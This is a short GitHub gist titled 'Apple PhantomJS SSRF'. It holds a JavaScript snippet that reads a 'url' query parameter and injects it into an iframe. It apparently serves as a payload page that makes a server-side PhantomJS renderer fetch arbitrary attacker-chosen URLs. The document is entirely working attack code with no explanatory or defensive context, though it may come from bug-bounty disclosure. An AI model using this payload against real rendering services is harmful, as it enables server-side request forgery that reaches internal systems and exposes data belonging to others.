Apple PhantomJS SSRF
function getQueryParams(qs) { | |
qs = qs.split('+').join(' '); | |
var params = {}, | |
tokens, | |
re = /[?&]?([^=]+)=([^&]*)/g; | |
while (tokens = re.exec(qs)) { | |
params[decodeURIComponent(tokens[1])] = decodeURIComponent(tokens[2]); | |
} | |
return params; | |
} | |
var query = getQueryParams(document.location.search); | |
var iframe = document.createElement("iframe"); | |
iframe.src = query.url; | |
var iframeParent = document.getElementById("meta"); | |
iframeParent.appendChild(iframe); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment